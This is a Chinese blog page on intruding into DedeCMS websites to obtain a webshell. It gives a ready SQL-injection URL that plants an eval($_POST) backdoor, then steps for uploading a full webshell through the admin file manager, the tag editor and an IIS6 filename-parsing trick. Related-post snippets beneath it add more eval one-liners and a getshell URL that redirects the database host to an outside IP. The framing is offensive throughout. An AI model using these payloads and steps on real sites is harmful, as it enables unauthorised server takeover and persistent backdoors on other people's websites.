dedecms入侵拿webshell之方法总结

最新推荐文章于 2024-06-12 21:59:05 发布
最新推荐文章于 2024-06-12 21:59:05 发布
阅读量835 收藏 2
点赞数
文章标签: php shell 运维
本文介绍了网站中存在的两种主要安全风险:SQL注入漏洞和非法获取WebShell的方法。详细解释了如何通过恶意构造URL参数来利用SQL注入漏洞,以及通过后台管理系统的不同途径上传恶意脚本文件以获取WebShell。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

1、注入漏洞

存在注入地址:在域名下输入plus/digg_frame.php?action=good&id=1024%651024&mid=*/eval($_POST[x]);var_dump(3);?>

http://localhost:802/plus/digg_frame.php?action=good&id=1024%651024&mid=*/eval($_POST[x]);var_dump(3);?>

注入成功,产生了注入文件。

http://localhost:802/data/mysql_error_trace.php

一句话木马连接上传大马即可!

注入漏洞详解见
http://www.hackline.net/a/news/ldfb/2009/0830/323.html

 

2、后台拿webshell

第一种方法,利用文件管理直接创建php大马```

后台--核心--附件管理--文件式管理器 新建文件,写入大马文件直接访问。

 

如果没有安装文件管理器,可以查看下插件目录有没有此插件文件。

后台--模块--模块管理--文件管理器 点击安装,然后在创建php大马```

如果没有安装插件,并删除了插件目录就无法使用此方法。


第二种方法:利用标签源码管理

后台--模板--标签源码管理,随便选择一个标签 点编辑。文件名称输入:格式为。xxx.lib.php,内容输入大马文件即可。

第三种方法、利用模板修改。

此方法利用IIS解析漏洞,前提网站必须在IIS6.0运行。

后台--模板--默认模板管理,随便选择一个模板 点编辑。文件名输入dama.php;1.htm,内容输入大马文件即可。
注意,此情况输入密码可能导致跳转显示无法找到网页,你可以输入密码后,再访问dama.php;1.htm这样就可以了。因为解析时截断了文件名变成dama.php了。

利用WebShellShell技巧
悦分享
08-01 2331
webshell就是以asp、php、jsp等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。黑客在入侵了一个网站后,通常会将asp或php等后门文件与网站服务器WEB目录下正常的网页文件混在一起,可以使用浏览器来访问留下的后门,达到控制网站服务器的目的。shell的含义是取得对服务器某种程度上的操作权限。webshell常常被称为入侵者通过网站端口对网站服务器的某种程度上操作的权限。...
安服面试点总结
1
02-22 9236
目录 3389无法连接的几种情况 二次注入 报错注入的函数 基于格式错误的报错(xpath语法错误) 基于主键重复错误 堆叠注入 判断出网站的CMS对渗透的意义 一个成熟并且相对安全的CMS,渗透时扫目录的意义? mysql注入点,用工具对目标站直接写入一句话,需要哪些条件? 1.3389无法连接的几种情况 端口没有开放 端口被修改了 被拦截了 没出网(处于内网(需要进行端口转发)) 2.二次注入 恶意数据经过一些转义函数(get_magic_quotes_gpc)的
织梦dedecms的框架的Webshell
wo41ge的博客
12-19 425
一、后台 后台登录 http://www.dedecms.com/dede 后台界面 二、Webshell方法 方法1:文件上传 蚁剑进行连接 成功 方法2:新建一句话文件 蚁剑连接 方法3:html修改 打开模板-默认模版管理-index.htm 文件包含 将FTP21端口改成:<?php @eval($_REQUEST["dayu"]); ?> ...
dedecms后台拿webshell
weixin_33910460的博客
12-09 145
dedecms 在禁止上传任何文件包括图片的时候 先把脚本***成jpg然后传到另外一个站上 然后利用文章发布 直接填写上图片地址 提交 会自动把图片下载进服务器 然后利用更新首页 模板选择马的路径 更新为 .php 就是你的马。 转载于:https://blog.51cto.com/obnus/449971...
dedecms网站入侵webshell方法总结
12-05 1318
dedecms网站入侵webshell方法 dedecms现已广泛流传,对其安全问题不易忽视!了解入侵方法做好网站安全措施。... dedecms网站入侵webshell方法 文章作者:udb311 转载请注明:http://www.hackline.net/ 1、注入漏洞 存在注入地址:在域名下输入plus/digg_frame.php?action=good&amp;id=1...
织梦dedecms5.5爆最新漏洞,可得到webshell
weixin_33788244的博客
12-03 609
影响版本:Dedecms 5.5漏洞描述:漏洞产生文件位于include\dialog\select_soft_post.php,其变量$cfg_basedir没有正确初始化,导致可以饶过身份认证和系统变量初始化文件,导致可以上传任意文件到指定目录。其漏洞利用前提是register_globals=on,可以通过自定义表单为相关的变量赋值。<*参考 by:Flyh4t*...
dede入侵步骤
weixin_30325487的博客
08-30 510
-------------------------------------------------------- 情简单整理下入侵测试的步骤: 漏洞利用实例 百度搜索关键字"Powered by DedeCMSV57_GBK 2004-2011 DesDev Inc",获得使用DeDeCMS系统的网站。 注入漏洞。...
50-webshell获取总结(cms获取方法、非cms获取方法、中间件拿Webshell方法
最新发布
XLbb的博客
06-12 2237
一、主要通过百度搜索CMS网站程序名称。如:phpcms拿Webshell、WordPress后台拿Webshell等。 二、1、数据库备份获取Webshell 2、抓包上传获取Webshell 3、Sql命令获取Webshell 4、模板修改获取Webshell 5、插入一句话获取Webshell 6、修改上传类型获取Webshell 三、其它获取Webshell方法:中间件拿Webshell方法 cookices靶场网站搭建和dedecms靶场环境搭建
云上应急 | 服务器被入侵了怎么办?
Y13716897790的博客
01-30 208
实用教程,收藏!云服务器入侵解除教程
mysql5.5.57 漏洞_DEDECMS(织梦程序)5.5-5.7通杀GetShell漏洞
weixin_42118161的博客
02-18 968
入侵步骤如下:http://www.oday.pw/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GL...
dede批量Getshell
10-31
这个是百度批量的。自己保存为xx.php <...$exploit=Getshell($url); if (...% 5BGLOBALS%5D%5Bcfg_dbname%5D=de...
批量拿shell
01-22
高手批量拿shell ,有技术没技术都可以看看,绝对是好的教程
渗透入侵\海洋顶端PHP注射工具.zip
07-15
海洋顶端PHP注射工具
织梦漏洞超级利用工具
07-03
软件功能非常强大,懂的人可以拿去测试呵呵,不懂的人,你也就OUT了!~~
渗透测试-地基篇-Webshell-织梦dedecms框架(八)
qq_34801745的博客
11-25 1900
** 渗透测试-地基篇-Webshell-织梦dedecms框架(八) ** 作者:大余 时间:2020-11-25 简介: 渗透测试-地基篇: 该篇章目的是重新牢固地基,加强每日训练操作的笔记,在记录地基笔记中会有很多跳跃性思维的操作和方式方法,望大家能共同加油学到东西。 请注意: 对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。我将使用Kali Linux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。 名言: 你对这行的兴趣
织梦php网站提权木马,dedecms过新版安全狗拿shell+提权
weixin_35915385的博客
03-12 379
http://www.mfztdw.net/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=...
DEDECMSSHELL EXP
收集盒 Book box
09-05 1022
此漏洞的前提是必须知道后台或plus 目录存在,服务器能外连,就能拿shell 因此大家一定要养成使用DEDECM建站时改后台名字的习惯。 MYSQL开启外链语句:GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTI
织梦DedeCMS防黑客入侵或DDOS攻击的方法
fengsalz的专栏
01-22 1884
织梦DedeCMS防黑客入侵或DDOS攻击的方法   DEDECMS开源是美好的,但很多时候网站出了问题,特别是网站被黑客入侵攻击等,往往只能寄希望与官方。而这,有时候并不能达到效果,因为很多时候网站被黑,也不一定是官方系统的漏洞,或者是老系统的漏洞,但由于我们的网站太过庞大,升级不易,从而让漏洞一直得不到升级。      Dedecms历史上
网站安全:从后台获取webshell的十大方法总结
"这篇文档是关于网站获取webshell的经典技巧集合,主要针对的是那些希望通过技术手段获取网站控制权的人员。文档中详细列举了十种常见的方法,包括直接上传、修改上传类型、利用后台管理功能、操作配置文件、数据库...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值